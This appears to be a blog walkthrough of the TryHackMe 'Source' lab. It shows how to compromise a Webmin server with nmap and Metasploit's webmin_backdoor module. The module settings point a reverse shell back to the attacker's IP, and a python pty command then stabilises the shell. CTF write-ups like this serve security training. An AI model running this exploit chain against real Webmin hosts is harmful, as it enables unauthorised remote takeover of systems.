DEV Community

Cover image for TryHackMe(THM)-Source Writeup
Ionut
Ionut

Posted on • Updated on

TryHackMe(THM)-Source Writeup

Image description

SOURCE

Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool.

Room link is here link

Task1

Image description
Enumerate and root the box attached to this task. Can you discover the source of the disruption and leverage it to take control?

I'm going to start the challenge by scanning the ip with nmap as in every challenge.
10.10.38.68 -> source.thm

nmap -sV -sC -A source.thm
Enter fullscreen mode Exit fullscreen mode

Image description

The output:

  1. Port 22 is for ssh.
  2. Port 10000 is the default port for webmin.

And the link would be:

https://10.10.38.68:10000
Enter fullscreen mode Exit fullscreen mode

Image description

Unfortunately we don't know the username and password to ssh and webmin and I tried to search directories with gobuster, but nothing.

gobuster dir -u https://10.10.38.68:10000 -w /usr/share/wordlists/dirb/common.txt
Enter fullscreen mode Exit fullscreen mode

Image description

The last option was to look for an exploit on Metasploit.

Image description

And yep, there are more vulnerabilities, and the exploit which I used is 5 “exploit/linux/http/webmin_backdoor” .

Image description

And now is need to set the LPORT, RHOSTS and ssl to true following these commands:

set RHOSTS 10.10.38.68 (Machine IP)
set LHOST 10.11.61.213 (YOUR IP)
set ssl true
Enter fullscreen mode Exit fullscreen mode

And now, to run the exploit simply type run/exploit.

Image description

To have a stable shell run these followings commands:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py
Enter fullscreen mode Exit fullscreen mode

And boom!! We have a stable shell
All we need to do now is to find the flags.

Image description

Top comments (0)